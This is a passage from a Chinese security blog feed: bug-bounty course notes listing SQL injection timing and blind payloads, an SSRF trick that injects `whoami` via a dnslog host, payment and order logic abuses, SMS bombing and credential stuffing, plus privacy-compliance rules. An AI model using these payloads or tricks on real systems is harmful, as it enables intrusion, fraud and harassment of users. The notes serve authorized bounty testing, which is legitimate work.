class="line">&#x27;) or sleep(5)&#x27;</span><br><span class="line">1)) or sleep(5)#</span><br><span class="line">&quot;)) or sleep(5)=&quot;</span><br><span class="line">&#x27;)) or sleep(5)=&#x27;</span><br><span class="line">;waitfor delay &#x27;0:0:5&#x27;--</span><br><span class="line">);waitfor delay &#x27;0:0:5&#x27;--</span><br></pre></td></tr></table></figure><p>sqlmap跑</p><h1 id="加密算法bypass"><a href="#加密算法bypass" class="headerlink" title="加密算法bypass"></a>加密算法bypass</h1><p>描述：订单预览的界面，发现订单号加密了，其加密算法为对称加密，无法获取密钥，也就无法解密。<br>请求：<br><code>https://app.example.com/DataEntry/OrderView?orderId=QUdjalfaljDSAFOjwdoiad</code></p><p>经过分析请求数据包发现加密接口<br><code>https://sapp.example.com/Common/EncryptText?text=2004140008</code></p><p>推测：该功能应该是为了防止通过订单号枚举越权访问而采用的安全措施。</p><h1 id="Js-map文件到越权漏洞"><a href="#Js-map文件到越权漏洞" class="headerlink" title="Js.map文件到越权漏洞"></a>Js.map文件到越权漏洞</h1><p>描述：后端程序对请求包体进行了签名校验，因此更改任何数据包都会导致签名校验失败</p><p>webpack打包：<code>https://app.example.com/app.js.map</code><br>源代码还原： <code># reverse-sourcemap --output-dir test app.js.map</code></p><h1 id="验证码绕过到任意-手机-x2F-邮箱轰炸"><a href="#验证码绕过到任意-手机-x2F-邮箱轰炸" class="headerlink" title="验证码绕过到任意-手机&#x2F;邮箱轰炸"></a>验证码绕过到任意-手机&#x2F;邮箱轰炸</h1><p>描述：每次触发验证码都触发图形验证码逻辑</p><p>删除头部的 <code>&quot;x&quot;:114</code> 元素即可批量发送</p><h1 id="信息泄露到OSS-Bucket接管"><a href="#信息泄露到OSS-Bucket接管" class="headerlink" title="信息泄露到OSS Bucket接管"></a>信息泄露到OSS Bucket接管</h1><p>描述：请求包返回加密的云凭证信息</p><h1 id="不一样的任意用户"><a href="#不一样的任意用户" class="headerlink" title="不一样的任意用户"></a>不一样的任意用户</h1><p>描述：用户注册，用户登录验证码本地回显[adb logcat 抓取触发验证码]</p><p>破解方法：验证码发到app里，在burp中无法抓包</p><h1 id="支付漏洞"><a href="#支付漏洞" class="headerlink" title="支付漏洞"></a>支付漏洞</h1><p>小程序抓包，购买参数，将数量改为小数，总价变少</p><h1 id="SSRF-RCE"><a href="#SSRF-RCE" class="headerlink" title="SSRF+RCE"></a>SSRF+RCE</h1><p>利用技巧： </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://www.example.com?url=http://`whoami`.teibgj.dnslog.cn</span><br></pre></td></tr></table></figure><p>先执行 <code>whoami</code> 命令，再执行ping命令，优先级前者高。</p><h1 id="二次注入绕过"><a href="#二次注入绕过" class="headerlink" title="二次注入绕过"></a>二次注入绕过</h1><p>在用户名或手机号后加空格，即使账号存在重名也可能能注册成功。<br>示例：<br>账号： <code>admin </code><br>手机号： <code>15300000000 </code></p><h1 id="更改文件类型解析"><a href="#更改文件类型解析" class="headerlink" title="更改文件类型解析"></a>更改文件类型解析</h1><p>场景：原本只允许解析pdf文件<br>修改：将文件内容和后缀改为html</p><h1 id="微信小程序反编译"><a href="#微信小程序反编译" class="headerlink" title="微信小程序反编译"></a>微信小程序反编译</h1><p>首先找到微信小程序，在 设置-文件管理 找到小程序文件。<br>解密工具：</p><ol><li>使用 PC微信小程序一键解密 By:代码果 工具</li><li>wxapkgconvertor</li><li>小锦哥小程序工具（全部集成）</li></ol><h1 id="众测项目"><a href="#众测项目" class="headerlink" title="众测项目"></a>众测项目</h1><h2 id="众测项目特点"><a href="#众测项目特点" class="headerlink" title="众测项目特点"></a>众测项目特点</h2><ol><li>项目周期短 - 基本为3-30天</li><li>奖金相对丰厚 - 最低标准（低危100，中危500，高危1000）</li><li>项目难度低，资产多（基础漏洞多）</li><li>竞争激烈 - 大项目基本上为多家竞测</li><li>金融项目较多，国有银行+股份制银行+城商、农商行+各大证券</li></ol><h2 id="项目分类"><a href="#项目分类" class="headerlink" title="项目分类"></a>项目分类</h2><ol><li>有测试范围的众测 - 从测试范围找脆弱资产</li><li>全互联网资产的众测 - 外包系统-&gt;小程序-&gt;公众号-&gt;主域名系统-&gt;APP</li><li>红队项目众测 - 不建议投入大量精力</li><li>每个月都有的特定目标众测 - 不建议参加</li></ol><h2 id="寻找外包系统"><a href="#寻找外包系统" class="headerlink" title="寻找外包系统"></a>寻找外包系统</h2><p>以邮储银行为例，对目标进行命名分析：</p><ol><li>中国邮政储蓄银行</li><li>邮储银行</li><li>邮储</li><li>邮政储蓄银行</li><li>邮政储蓄</li><li>英文缩写：1、POSTAL SAVINGS BANK OF CHINA 2、psbc</li><li>中文缩写：1、 youchu 2、ycyh 3、yzcxyh 4、yzcx</li></ol><p>语法：</p><ol><li>title</li><li>domain</li><li>body</li></ol><h2 id="hunter使用技巧"><a href="#hunter使用技巧" class="headerlink" title="hunter使用技巧"></a>hunter使用技巧</h2><ol><li>默认列出一个月，改为一年</li><li>有些没有站点标题的也要点进去看，可能有东西</li><li>有些时候可以排除香港台湾</li><li>筛选出国家可获得更精准数据</li><li>可从域名排名和icon排名排除掉大量目标外的站点</li><li>使用此语法可快速模糊搜索出邮储的外包系统: <code>domain=&quot;psbc&quot; and domain!=&quot;psbc.com&quot;</code></li></ol><h2 id="基于调用hunter和fofa，省去了点击IP的步骤-小工具"><a href="#基于调用hunter和fofa，省去了点击IP的步骤-小工具" class="headerlink" title="基于调用hunter和fofa，省去了点击IP的步骤 小工具"></a>基于调用hunter和fofa，省去了点击IP的步骤 小工具</h2><p><code>https://github.com/0x727/Space_view</code></p><h2 id="指纹识别快速getshell"><a href="#指纹识别快速getshell" class="headerlink" title="指纹识别快速getshell"></a>指纹识别快速getshell</h2><p>使用语法搜索-导出下载-指纹识别-过滤<br>指纹识别: <code>https://github.com/0x727/ObserverWard</code><br>命令: <code>observer_ward.exe -f dom.txt -c dom.csv</code></p><h1 id="订单-支付漏洞"><a href="#订单-支付漏洞" class="headerlink" title="订单-支付漏洞"></a>订单-支付漏洞</h1><ol><li>订单id与账号没有绑定，替换订单id购买便宜内容</li><li>订单无过期，生成多个订单</li><li>在订单id中找到订单价格为0的订单id，替换购买，无支付页面显示，直接完成订单</li></ol><h1 id="注册漏洞"><a href="#注册漏洞" class="headerlink" title="注册漏洞"></a>注册漏洞</h1><p>场景：<br>企业注册<br>需要填写企业名称，统一信用代码，手机号，登录密码，确认密码，图形验证码，短信验证码。</p><p>在网上随便找一家公司，填入企业名称和统一信用代码，手机号和密码自己填。登录进入后是一个企业内部账号，手机号不是自己的。</p><h1 id="利用加密越权"><a href="#利用加密越权" class="headerlink" title="利用加密越权"></a>利用加密越权</h1><p>场景：<br>请求包和返回包中都有vendorCode，请求包的是加密的，返回包的是解密的。<br>有上传附件功能，在请求包中有fileRelatId，发现fileRelatId和vendorCode加密很像</p><p>利用方式：利用fileRelatId，在返回包中找到未加密的fileRelatId，将其改为自己想加密的内容，然后加密出自己想要的vendorCode。</p><h1 id="隐藏参数越权"><a href="#隐藏参数越权" class="headerlink" title="隐藏参数越权"></a>隐藏参数越权</h1><p>场景：<br>注册，抓包，有userId, mobile等各种注册信息。</p><p>利用方式：将uid置空，出现隐藏参数。返回包显示“uid，mobile和userid不能同时为空”。由于请求包中无mobile参数，于是将请求包中的uid参数删除，改为mobile参数，手机号使用企业内部手机号。</p><p>因为公司内部手机号是批量给员工发的，所以对员工手机号的后3位进行爆破。得到大量注册信息。</p><h1 id="SSRF"><a href="#SSRF" class="headerlink" title="SSRF"></a>SSRF</h1><p>发现url中存在ueditor，利用nday找到编辑器漏洞SSRF即可。</p><h1 id="隐藏接口越权"><a href="#隐藏接口越权" class="headerlink" title="隐藏接口越权"></a>隐藏接口越权</h1><p>使用findsomething<br>找到空页面，抓包发现有查询字段，查询接口可以使用，即可越权。</p><h1 id="凌风云百度网盘"><a href="#凌风云百度网盘" class="headerlink" title="凌风云百度网盘"></a>凌风云百度网盘</h1><p>搜索出信息泄露，比如: 京东 合同，小米 合同<br>修复建议：以官方身份给百度网盘发邮件，删除内容。</p><h1 id="短信轰炸"><a href="#短信轰炸" class="headerlink" title="短信轰炸"></a>短信轰炸</h1><p>最后再测，以免手机号废掉。<br>payload：抓包在手机号后面加“,1” “+” 之类的。</p>]]></content>
    
    
    <summary type="html">&lt;h1 id=&quot;前言&quot;&gt;&lt;a href=&quot;#前言&quot; class=&quot;headerlink&quot; title=&quot;前言&quot;&gt;&lt;/a&gt;前言&lt;/h1&gt;&lt;p&gt;课程内部月度分享。SRC内容补充，其它关于护网逆向的内容就再看一遍课好了。&lt;/p&gt;</summary>
    
    
    
    <category term="SRC" scheme="http://example.com/categories/SRC/"/>
    
    
    <category term="SRC" scheme="http://example.com/tags/SRC/"/>
    
  </entry>
  
  <entry>
    <title>SRC_cource_15</title>
    <link href="http://example.com/2023/12/22/SRC_cource_15/"/>
    <id>http://example.com/2023/12/22/SRC_cource_15/</id>
    <published>2023-12-21T16:00:00.000Z</published>
    <updated>2023-12-25T08:57:00.591Z</updated>
    
    <content type="html"><![CDATA[<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>学员0-1分享课程。从中汲取一点新东西。</p><span id="more"></span><h1 id="2022-6-4"><a href="#2022-6-4" class="headerlink" title="2022.6.4"></a>2022.6.4</h1><h2 id="信息泄露方面"><a href="#信息泄露方面" class="headerlink" title="信息泄露方面"></a>信息泄露方面</h2><ol><li><p>google hack<br>site:<br>filetype:<br>intext:</p></li><li><p>.git泄露<br>githack.py<br>地址：<br><code>https://github.com/lijiejie/GitHack</code><br>使用方法：<br><code>GitHack.py http://www.openssl.org/.git/</code></p></li><li><p>svn泄露subversion源码管理工具<br>.svn&#x2F;entries<br>直接在后面加上上面的东西<br>或者用下面的工具<br><code>https://github.com/admintony/svnExploit</code></p></li><li><p>spring（大多不收）<br>spring接口泄露</p></li><li><p>.bashrc个人配置记录<br>&#x2F;.ssh&#x2F;authorized–keys<br>&#x2F;.bash–history<br>泄露站点服务器j记录</p></li><li><p>sql报错语句泄露</p></li><li><p>xray（谨慎使用）</p></li><li><p>dirsearch</p></li><li><p>测试环境漏洞挖掘<br>公告给的</p></li><li><p>威胁情报获取<br>工具搜<br><code>https://www.lingfengyun.com/</code><br>合同<br>设计图纸<br>身份证<br>通讯录<br>搜索引擎搜<br>疑似被黑赌博信息</p></li><li><p>DS_store (mac生产文件的位置信息可以用dirsearch找到这个漏洞通过工具python2下载源码)<br><code>https://github.com/lijiejie/ds_store_exp</code><br>druid未授权访问（阿里数据库连接池）<br>未授权访问路径<br>html:<br>ip&#x2F;druid&#x2F;index.html</p></li></ol><p>##Druid sql监控页面<br>ip&#x2F;druid&#x2F;weburi.html<br>##Druid Web URI监控页面<br>ip&#x2F;druid&#x2F;websession.html<br>##Druid Web Session监控页面<br>json:<br>ip&#x2F;druid&#x2F;weburi.json<br>##Druid Web URI json<br>ip&#x2F;druid&#x2F;websession.json<br>##Druid Web Session json<br>Druid 登录接口：<br>ip&#x2F;druid&#x2F;login.html<br>##Druid登录认证页面</p><p>谷歌语法查询<br>site:xx.com intitle:Druid Stat Index</p><h2 id="登录口"><a href="#登录口" class="headerlink" title="登录口"></a>登录口</h2><ol><li><p>万能密码<br>F12看返回包有没有<br>js中看路径可不可以拼接<br>xhr和xml中有没有存取密码</p></li><li><p>代码审计<br>信息泄露的源代码<br>git<br>svn</p></li><li><p>nday攻击<br>CMS识别<br>看框架打<br>spring<br>struct<br>看返回包里面的</p></li><li><p>撞库<br>手机号撞库<br>账号密码撞库<br>社工库撞库</p></li><li><p>暴力破解用户名密码<br>可爆破多次也算漏洞<br>注册验证已存在账号<br>用户名密码错误<br>通过注册验证出已注册<br>再进行爆破</p></li><li><p>账号权限绕过<br>改参数绕过<br>未授权拼接js绕过</p></li><li><p>验证码爆破和绕过<br>有直接回显<br>可重用验证</p></li><li><p>注入<br>sql注入<br>get参数注入<br>post注入<br>html注入</p></li><li><p>信息泄露或未授权<br>js拼接<br>getsomething</p></li><li><p>目录扫描<br>DDOS<br>验证码图片DDOS</p></li></ol><h2 id="深入业务"><a href="#深入业务" class="headerlink" title="深入业务"></a>深入业务</h2><ol><li>网站业务线流程梳理，搞清楚业务线之间的联系</li><li>跳出用户视角</li></ol><h2 id="新姿势分享"><a href="#新姿势分享" class="headerlink" title="新姿势分享"></a>新姿势分享</h2><ol><li>密保密码找回场景<br>抓包，直接删除POST内容</li></ol><h1 id="2022-6-11"><a href="#2022-6-11" class="headerlink" title="2022.6.11"></a>2022.6.11</h1><h2 id="反向并发"><a href="#反向并发" class="headerlink" title="反向并发"></a>反向并发</h2><p>挖掘并发漏洞时，不一定要让点赞增加，可以让点赞减少。</p><h2 id="危害角度转变"><a href="#危害角度转变" class="headerlink" title="危害角度转变"></a>危害角度转变</h2><p>场景：看广告视频，每次能获得100金币，每天最多能看10次广告。<br>操作：同时并发10次看广告视频，减少看广告视频的时间获得1000金币。（只能并发10次）<br>危害：减少看广告，减少广告商的流量，导致广告商不再此平台投放广告，造成平台广告收入数十万到数百万的损失。（中危）</p><h2 id="绕过关注限制发图片"><a href="#绕过关注限制发图片" class="headerlink" title="绕过关注限制发图片"></a>绕过关注限制发图片</h2><p>场景：聊天框中需要互相关注才能使用图片&#x2F;拍照功能，如果判断没有互相关注，则无法发送。<br>操作：抓包修改参数isFollowing从False改为True。<br>危害：批量打广告，骚扰用户。</p><h2 id="突破购买限制达到锁定库存的目的"><a href="#突破购买限制达到锁定库存的目的" class="headerlink" title="突破购买限制达到锁定库存的目的"></a>突破购买限制达到锁定库存的目的</h2><p>场景：A商品一个用户只能买50个，库存最大数量为996个。<br>操作：提交订单时，将数量修改为996个。达到持续锁定库存的目的。<br>危害：通过提交订单锁定库存，其他人无法购买，导致商家经营遭受损失。</p><h1 id="2022-6-25"><a href="#2022-6-25" class="headerlink" title="2022.6.25"></a>2022.6.25</h1><ol><li><p>半价购买<br>场景：购买云产品。<br>操作：将数量修改为0.5，达到半价购买目的。</p></li><li><p>币种替换<br>场景：原本是按USD购买，参数为priceUSD<br>操作：将priceUSD改为priceCNY，替换币种减少金钱。</p></li><li><p>修改赠送物品<br>场景：购买一件A商品后，赠送了B，C物品。<br>操作：将B，C物品的数量参数增大。结果获得更多物品。</p></li><li><p>0元购的修改点<br>在一个类似于淘宝的电商环境中，首先尝试在加入购物车时抓包修改数量参数，然后尝试在购物车中修改数量的位置抓包修改数量参数，最后尝试在提交订单时抓包修改数量参数。也即每个点都要进行测试。</p></li><li><p>手机号修改<br>在手机号前面加0，加+，或者进行编码等等。</p></li><li><p>变相0元购<br>场景：余额有3元，可提现但是通过人工审核。<br>操作：先提现，在人工审核期间赶紧把钱花光。最后达到既提现又花钱的目的。</p></li><li><p>更改url达到0元购目的<br>场景：购买一件带时间限制的产品，url中存在参数sixmonths, years等时间参数。<br>操作：购买years时间的产品，实际更改为sixmonths，达到0元购目的。原因是后面藏了时间参数标价为0</p></li><li><p>免费抽奖<br>场景：下单购买一件商品，赠送一次抽奖活动。<br>操作：购买商品后抽奖，再进行退货。获得免费抽奖的目的。</p></li><li><p>假漏洞也要提交<br>假漏洞即指的无实际危害的漏洞。比如下单购买一件商品，修改参数后价格为0元，但是实际无法支付，这个就是假漏洞。<br>提交后仍有可能通过。</p></li><li><p>同一接口不同价格<br>有的网站在不同页面使用同一接口充值，但是A方式和B方式价格不同，或是相同价格下数量不同。逻辑不一致。</p></li></ol><h1 id="2022-8-18"><a href="#2022-8-18" class="headerlink" title="2022.8.18"></a>2022.8.18</h1><ol><li>优惠券可遍历<br>场景：在电商平台中，分为两种优惠券，一种是平台发放的优惠券，一种是商家发放优惠券。具体参数示例如下：<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&quot;extensions&quot;:&#123;</span><br><span class="line">&quot;CHOOSE_PLATFORM_VOUCHER_ID&quot;:&quot;102220604141051000000&quot;,</span><br><span class="line">&quot;_platformVoucherParams&quot;:&#123;</span><br><span class="line">&quot;alias&quot;:&quot;270p8xgtullsloj&quot;,</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>操作：其中，CHOOSE参数可以遍历，观察可知是以时间发放的优惠券，那么可以造成注册商家后无限使用平台优惠券达到薅羊毛的行为。</li></ol><h1 id="2022-10-22"><a href="#2022-10-22" class="headerlink" title="2022.10.22"></a>2022.10.22</h1><h2 id="验证码加参数"><a href="#验证码加参数" class="headerlink" title="验证码加参数"></a>验证码加参数</h2><p>height&#x3D;1111<br>h&#x3D;1111<br>size&#x3D;1111<br>margin&#x3D;1111</p><h1 id="2022-11-6"><a href="#2022-11-6" class="headerlink" title="2022.11.6"></a>2022.11.6</h1><h2 id="挖洞小思路"><a href="#挖洞小思路" class="headerlink" title="挖洞小思路"></a>挖洞小思路</h2><p>挖SRC的时候，在一个站挖出了一些常规漏洞，可以将该站的favicon.ico保存下来，丢到fofa中，然后刷一遍，增加额外收获。</p><h2 id="注入"><a href="#注入" class="headerlink" title="注入"></a>注入</h2><p>注入不一定都在小型src，某些大公司的src也有注入，src的注入payload也不一定很难。有些简单的payload都能直接达到效果，可以试试，不一定在边缘域名，主站也可能存在。</p><ol><li>手挖</li><li>用payload（高频: 0%27XOR(if(now()&#x3D;sysdate()%2Csleep(3)%2C0))XOR%27Z ）</li><li>使用扫描器（少用）</li></ol><p>常出现的：报错注入，时间盲注，get和post都有，数据包(Referer)里。</p><p>burp插件推荐：<code>https://github.com/smxiazi/xia_sql</code></p><p>注意：</p><ol><li>SQL注入能够看到库名即可提交。</li><li>如果有dba权限，可以直接提升漏洞等级。</li></ol><p>发现sql注入后常用的注入语句：<br><code>if((length(database())=8),5,0)</code><br><code>if((mid(database(),1,1)=&#39;y&#39;),5,0)</code><br><code>if(ord(substr(database(),1,1))&gt;120,5,0)</code></p><p>测试是否存在SQL注入的方式：<br>在参数位置1’  1&#x2F;0  @@  1&#x2F;1</p><p>代理IP池：爱加速</p>]]></content>
    
    
    <summary type="html">&lt;h1 id=&quot;前言&quot;&gt;&lt;a href=&quot;#前言&quot; class=&quot;headerlink&quot; title=&quot;前言&quot;&gt;&lt;/a&gt;前言&lt;/h1&gt;&lt;p&gt;学员0-1分享课程。从中汲取一点新东西。&lt;/p&gt;</summary>
    
    
    
    <category term="SRC" scheme="http://example.com/categories/SRC/"/>
    
    
    <category term="SRC" scheme="http://example.com/tags/SRC/"/>
    
  </entry>
  
  <entry>
    <title>SRC_course_13</title>
    <link href="http://example.com/2023/12/19/SRC_course_13/"/>
    <id>http://example.com/2023/12/19/SRC_course_13/</id>
    <published>2023-12-18T16:00:00.000Z</published>
    <updated>2023-12-20T11:18:42.648Z</updated>
    
    <content type="html"><![CDATA[<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>隐私合规漏洞第1,2课。</p><span id="more"></span><h1 id="隐私政策"><a href="#隐私政策" class="headerlink" title="隐私政策"></a>隐私政策</h1><p>隐私政策是独立于用户协议的，需要公开APP所有处理规则和基本情况，包括开办主体的基本信息，APP对个人信息收集、使用、共享及披露开办主体的基本信息，APP对个人信息收集、使用、共享及披露的基本情况，用户对于处理自己信息的基本权利，包括查看（无隐私政策或隐私政策无法打开的APP）、删除（能否撤销授权或删除个人相关信息，如地址，身份证等）、注销（能否注销账号）、投诉等以及政策发布、生效或更新日期。</p><p>隐私政策描述的情况也需要符合APP实际情形，例如隐私政策中对于注销、投诉提供的操作方法，需与APP内实际操作路径相一致。（不一致即可提交，最高到严重）</p><p>另外，对于业务开展目标用户为14周岁以下的儿童，需要有专门的儿童个人信息保护规则。过世人员也需留意。</p><h1 id="等级判定"><a href="#等级判定" class="headerlink" title="等级判定"></a>等级判定</h1><p>首先按企业的评分标准，如果在评分标准中未说明，自评高危即可。</p><h1 id="隐私合规漏洞参考标准"><a href="#隐私合规漏洞参考标准" class="headerlink" title="隐私合规漏洞参考标准"></a>隐私合规漏洞参考标准</h1><ol><li>关于印发《App违法违规收集使用个人信息行为认定方法》的通知</li><li>关于印发《常见类型移动互联网应用程序必要个人信息范围规定》的通知</li><li>工业和信息化部关于k开展纵深推进App侵害用户权益专项整治行动的通知</li><li>个人信息安全规范</li><li>App收集使用个人信息最小必要评估规范</li><li>《中华人民共和国个人信息保护法》</li></ol><h1 id="场景"><a href="#场景" class="headerlink" title="场景"></a>场景</h1><h2 id="用户默认同意隐私政策—违规"><a href="#用户默认同意隐私政策—违规" class="headerlink" title="用户默认同意隐私政策—违规"></a>用户默认同意隐私政策—违规</h2><ol><li>App首次运行</li><li>注册&#x2F;登录环节</li><li>收集使用个人信息的目的、方式、范围发生变化时</li><li>现版本没有主动提醒的（即使文本内容不变）</li></ol><p>弹窗内简要说明《隐私政策》要点</p><ol><li>点击跳转《隐私政策》详情页面</li><li>给予用户2个选择，同意或拒绝。在用户点同意之前，禁止任何的数据收集；用户选择拒绝后，可提示即将退出app（点拒绝直接退出违规，二次确认不违规）</li></ol><p>“注册即同意《用户协议》和《隐私政策》”，如果该方框默认勾上，则违规。<br>此方框需要用户勾选。</p><p>在注册登录环节需要再次提醒用户查看，一般会采用勾选框等形式。也要确保用户进入App后能随时查看隐私政策，一般要求在4次以内点击就能阅读到。所有地方的隐私政策内容需保持一致。</p><h2 id="用户默认同意隐私政策报告—示例（需最新版本）"><a href="#用户默认同意隐私政策报告—示例（需最新版本）" class="headerlink" title="用户默认同意隐私政策报告—示例（需最新版本）"></a>用户默认同意隐私政策报告—示例（需最新版本）</h2><p>标题：xx app 1.1.1版本存在默认用户同意隐私政策漏洞<br>内容：<br>在小米官方商店，下载 xx app最新版，版本xxx<br>打开app，输入手机号注册，发现左下角默认同意了该隐私政策</p><p>【图片证据】</p><p>此行为违反了xx规定的第x条</p><p>修复建议：<br>这个勾选应该由用户自己勾选，并非系统默认代替用户点击同意。</p><h2 id="收集手机号（不挖）"><a href="#收集手机号（不挖）" class="headerlink" title="收集手机号（不挖）"></a>收集手机号（不挖）</h2><p>并不是所有的功能都需要手机号实名。</p><h2 id="用户拒绝提供不必要的信息直接退出app—违规"><a href="#用户拒绝提供不必要的信息直接退出app—违规" class="headerlink" title="用户拒绝提供不必要的信息直接退出app—违规"></a>用户拒绝提供不必要的信息直接退出app—违规</h2><p>用户注册过程所收集的信息应遵循最小必要信息相关要求，当用户拒绝提供非最小必要信息或用户拒绝最小必要权限列表以外的权限时，是不能影响继续注册或使用基本功能服务。当然相对于基本信息外的其它附加功能，也是可以根据产品定位收集额外用户信息。</p><h2 id="注销功能"><a href="#注销功能" class="headerlink" title="注销功能"></a>注销功能</h2><p>有注册功能就对应要有注销功能。<br>App要提供有效并且简单易操作的账号注销功能，同时注销条件限制合理。<br>合理的方式：如注销提供条件不能多于注册时的条件。使用联合登录方式的账号注销，仅应解除关联或匿名化处理本app内账号关联信息。</p><h2 id="权限获取要求"><a href="#权限获取要求" class="headerlink" title="权限获取要求"></a>权限获取要求</h2><ol><li><p>目的声明<br>发起权限申请前，应以弹窗形式提前说明申请权限的场景，目的，将会收集的信息。</p></li><li><p>用户交互<br>若用户同意授权，开始收集对应权限的信息或行使对应权限功能。</p></li><li><p>若用户拒绝授权，则提供一个静态页面说明申请权限的理由引导用户授权。当用户再次主动使用所需权限对应的功能时，触发弹窗申请。否则弹窗申请频率不能低于48小时一次。</p></li></ol><h2 id="APP申请权限"><a href="#APP申请权限" class="headerlink" title="APP申请权限"></a>APP申请权限</h2><ol><li>场景化申请</li><li>申请敏感权限需要向用户明示收集使用的目的和用途。</li><li>敏感权限为可收集个人信息的权限，举例如下：<br>ios系统：IDFA，定位，通讯录，日历，提醒事项，照片，麦克风，相机，健康<br>Android系统：定位，通讯录，日历，存储，相机，麦克风，电话，短信，应用安装列表，身体传感器。</li><li>具体实现可采用弹框，占位页等形式进行说明申请权限的理由。在APP使用中，若用户明确拒绝授权，则不能频繁申请权限。不频繁的申请频率应为超过48小时再次申请。</li></ol><h2 id="身份证号"><a href="#身份证号" class="headerlink" title="身份证号"></a>身份证号</h2><p>实名认证若涉及到人脸识别，需单独告知用户收集使用的方式，目的，范围以及存储时间等。</p><h2 id="推送"><a href="#推送" class="headerlink" title="推送"></a>推送</h2><ol><li>应当有关闭“个性化推荐”的按钮，否则违规。</li><li>个人信息保护法中提到“通过自动化决策方式向个人进行信息…”</li><li>涉及到开屏广告，要确保能一键关闭，不可利用文字、整屏图片、视频等方式欺骗用户跳转，应当在广告内容中显著标明警示语，告知用户点击将跳转至第三方应用，确保用户知情。</li></ol><h2 id="用户投诉"><a href="#用户投诉" class="headerlink" title="用户投诉"></a>用户投诉</h2><p>涉及人工处理的，承诺处理时限应不超过15个工作日。否则违规。</p><h2 id="未成年人用户管理和成年人用户需不同"><a href="#未成年人用户管理和成年人用户需不同" class="headerlink" title="未成年人用户管理和成年人用户需不同"></a>未成年人用户管理和成年人用户需不同</h2><ol><li>未成年和成年管理应有不同。</li><li>需设置青少年模式。</li></ol><h2 id="接入SDK服务的注意事项（初学不建议，需会移动安全抓包）"><a href="#接入SDK服务的注意事项（初学不建议，需会移动安全抓包）" class="headerlink" title="接入SDK服务的注意事项（初学不建议，需会移动安全抓包）"></a>接入SDK服务的注意事项（初学不建议，需会移动安全抓包）</h2><p>SDK的合理合规配置。</p><h2 id="小程序"><a href="#小程序" class="headerlink" title="小程序"></a>小程序</h2><p>小程序合规和APP基本一致</p><h2 id="小米手机检测自启动跟用户程序检索"><a href="#小米手机检测自启动跟用户程序检索" class="headerlink" title="小米手机检测自启动跟用户程序检索"></a>小米手机检测自启动跟用户程序检索</h2><p>使用小米的应用行为记录。确保用户信息。</p><h2 id="收隐私合规漏洞的企业"><a href="#收隐私合规漏洞的企业" class="headerlink" title="收隐私合规漏洞的企业"></a>收隐私合规漏洞的企业</h2><p>途虎，麦当劳，爱奇艺，小米，金山</p><h2 id="价格"><a href="#价格" class="headerlink" title="价格"></a>价格</h2><ol><li><p>爱奇艺标准：<br>低危：30-50<br>中危：100-300<br>高危：400-600</p></li><li><p>小米标准<br>高危漏洞：300-500（贡献币）<br>中危漏洞：80-120（贡献币）<br>低危漏洞：10-30（贡献币）<br>注：1贡献币&#x3D;10元</p></li></ol><h1 id="隐私合规第2课"><a href="#隐私合规第2课" class="headerlink" title="隐私合规第2课"></a>隐私合规第2课</h1><h2 id="申请相机权限未告知用户目的"><a href="#申请相机权限未告知用户目的" class="headerlink" title="申请相机权限未告知用户目的"></a>申请相机权限未告知用户目的</h2><p>违反了191号文件《App违法违规收集使用个人信息行为认定方法》中第二类第3条</p><p>修复建议：应该在动态申请相机权限时说明使用该权限的目的，例如：用于扫码登录，拍照上传头像等，根据实际业务来写。</p><h2 id="首次运行未经用户阅读并同意隐私政策，申请获取位置权限"><a href="#首次运行未经用户阅读并同意隐私政策，申请获取位置权限" class="headerlink" title="首次运行未经用户阅读并同意隐私政策，申请获取位置权限"></a>首次运行未经用户阅读并同意隐私政策，申请获取位置权限</h2><h2 id="登录页面无主动提供勾选等方式提示用户阅读隐私政策收集使用规则"><a href="#登录页面无主动提供勾选等方式提示用户阅读隐私政策收集使用规则" class="headerlink" title="登录页面无主动提供勾选等方式提示用户阅读隐私政策收集使用规则"></a>登录页面无主动提供勾选等方式提示用户阅读隐私政策收集使用规则</h2><h2 id="打开xx小程序时首次运行未通过弹窗主动勾选等方式体时用户阅读隐私政策"><a href="#打开xx小程序时首次运行未通过弹窗主动勾选等方式体时用户阅读隐私政策" class="headerlink" title="打开xx小程序时首次运行未通过弹窗主动勾选等方式体时用户阅读隐私政策"></a>打开xx小程序时首次运行未通过弹窗主动勾选等方式体时用户阅读隐私政策</h2><h2 id="测试点为工信部164号文重点要求的用户IMEI，IMSI，应用程序列表等个人信息收集合规"><a href="#测试点为工信部164号文重点要求的用户IMEI，IMSI，应用程序列表等个人信息收集合规" class="headerlink" title="测试点为工信部164号文重点要求的用户IMEI，IMSI，应用程序列表等个人信息收集合规"></a>测试点为工信部164号文重点要求的用户IMEI，IMSI，应用程序列表等个人信息收集合规</h2><p>首次APP打开还未登录就开始在后台收集应用程序列表</p><h2 id="个人隐私政策中出现错别字"><a href="#个人隐私政策中出现错别字" class="headerlink" title="个人隐私政策中出现错别字"></a>个人隐私政策中出现错别字</h2><h2 id="小程序未提供有效注销用户账号功能"><a href="#小程序未提供有效注销用户账号功能" class="headerlink" title="小程序未提供有效注销用户账号功能"></a>小程序未提供有效注销用户账号功能</h2><h2 id="强制收集用户联系方式（与隐私政策描述不符）"><a href="#强制收集用户联系方式（与隐私政策描述不符）" class="headerlink" title="强制收集用户联系方式（与隐私政策描述不符）"></a>强制收集用户联系方式（与隐私政策描述不符）</h2><h2 id="字体加粗"><a href="#字体加粗" class="headerlink" title="字体加粗"></a>字体加粗</h2><p>未对重点信息加粗</p><h2 id="无法访问隐私政策"><a href="#无法访问隐私政策" class="headerlink" title="无法访问隐私政策"></a>无法访问隐私政策</h2><h2 id="隐私合规测试清单"><a href="#隐私合规测试清单" class="headerlink" 